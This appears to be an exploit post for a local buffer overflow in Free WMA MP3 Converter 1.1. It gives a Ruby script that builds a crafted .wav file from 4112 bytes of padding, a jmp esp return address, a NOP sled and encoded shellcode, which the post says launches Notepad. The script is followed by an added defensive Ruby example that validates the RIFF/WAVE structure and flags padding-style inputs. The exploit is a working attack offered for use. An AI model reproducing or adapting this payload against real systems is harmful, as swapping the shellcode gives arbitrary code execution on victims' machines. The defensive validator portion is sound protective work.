sorry was missing some text from my previous email

# Exploit Title: Free WMA MP3 Converter
# Date: 02/04/2010
# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
# category local exploit

To trigger the vulnerability, open up the application, choose wav to mp3, load the specially crafted wav file and click convert. Probably works for all the other options too, eg mp3 to wav etc.

Run the code below and pipe it into a .wav file.

#code
#!/usr/bin/env ruby

# single NOP byte; repeated below to build the sled in front of the shellcode
nop = "\x90"

# imagehlp: address of a jmp esp instruction, packed little-endian
jmp_esp = [0x76cafa32].pack('V')

# shellcode opens notepad
shellcode = "\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

# 4112 bytes of padding up to the saved return address, then the jmp esp
# address, a 10-byte NOP sled and the shellcode
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom
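The file the script above emits is not a WAV at all: it is a bare 4112-byte run of 0x41, a 4-byte return address, a short NOP sled and shellcode, with no RIFF header, and the converter still reads it straight into a fixed-size buffer. The defensive counterpart is a strict pre-check that refuses anything that is not a well-formed RIFF/WAVE file and caps chunk sizes before they reach such a buffer. The Ruby below is an added example written for this page, not code from the post or from the Free WMA MP3 Converter; the function names, the MAX_CHUNK_SIZE and MAX_RUN_LENGTH thresholds and the two sample inputs are all constructed here, and the "crafted" sample only mimics the padding shape of the post's payload without any shellcode.

```ruby
# Added defensive example (not part of the original post): strict WAV
# pre-validation plus a triage heuristic for padding-style inputs.

MAX_CHUNK_SIZE = 64 * 1024 * 1024   # assumed sane upper bound for one chunk
MAX_RUN_LENGTH = 1024               # assumed: flag > 1 KiB of one repeated byte

Finding = Struct.new(:ok, :reasons)

# Walk the RIFF structure: 'RIFF' <u32 size> 'WAVE', then chunks of
# <4-byte id> <u32 little-endian size> <payload>, word-aligned.
def check_wav(data)
  reasons = []
  if data.bytesize < 12 || data[0, 4] != "RIFF" || data[8, 4] != "WAVE"
    reasons << "missing RIFF/WAVE header"
    return Finding.new(false, reasons)
  end
  riff_size = data[4, 4].unpack1("V")
  if riff_size + 8 != data.bytesize
    reasons << "RIFF size #{riff_size} does not match file length #{data.bytesize - 8}"
  end
  off = 12
  seen = []
  while off + 8 <= data.bytesize
    id = data[off, 4]
    size = data[off + 4, 4].unpack1("V")
    if size > MAX_CHUNK_SIZE
      reasons << "chunk #{id.inspect} declares #{size} bytes (over cap)"
      break
    end
    if off + 8 + size > data.bytesize
      reasons << "chunk #{id.inspect} size #{size} runs past end of file"
      break
    end
    reasons << "fmt chunk too short (#{size} < 16)" if id == "fmt " && size < 16
    seen << id
    off += 8 + size + (size & 1)
  end
  reasons << "no fmt chunk" unless seen.include?("fmt ")
  reasons << "no data chunk" unless seen.include?("data")
  Finding.new(reasons.empty?, reasons)
end

# Longest run of one repeated byte. Padding-style inputs (thousands of 0x41)
# stand out, but so does digital silence, so treat this as a triage signal
# and rely on check_wav as the actual control.
def longest_byte_run(data)
  best = 0
  run = 0
  prev = nil
  data.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

def suspicious?(data)
  !check_wav(data).ok || longest_byte_run(data) > MAX_RUN_LENGTH
end

# Constructed sample 1: a minimal valid 8-bit mono PCM WAV with four samples.
def build_minimal_wav(samples = "\x80\x80\x80\x80".b)
  samples = samples.b
  fmt = [1, 1, 8000, 8000, 1, 8].pack("vvVVvv")   # PCM, mono, 8 kHz, 8-bit
  body = "WAVE" + "fmt " + [fmt.bytesize].pack("V") + fmt +
         "data" + [samples.bytesize].pack("V") + samples
  "RIFF" + [body.bytesize].pack("V") + body
end

# Constructed sample 2: headerless padding in the shape the post describes
# (a long run of 0x41, then a few filler bytes). No shellcode is included.
PADDING_ONLY = ("\x41" * 4112 + "\x00\x00\x00\x00" + "\x90" * 10).b

if __FILE__ == $0
  [["minimal.wav", build_minimal_wav], ["crafted.wav", PADDING_ONLY]].each do |name, blob|
    f = check_wav(blob)
    puts "#{name}: #{f.ok ? 'ok' : 'REJECT'} #{f.reasons.join('; ')} run=#{longest_byte_run(blob)}"
  end
end
```

Running it reports the minimal WAV as ok and rejects the crafted input for lacking a RIFF/WAVE header; the run-length heuristic additionally reports 4112 for the crafted input against 4 for the real file. The header check is the part worth keeping in a converter: any chunk whose declared size exceeds the file or a fixed cap is refused before it is copied anywhere.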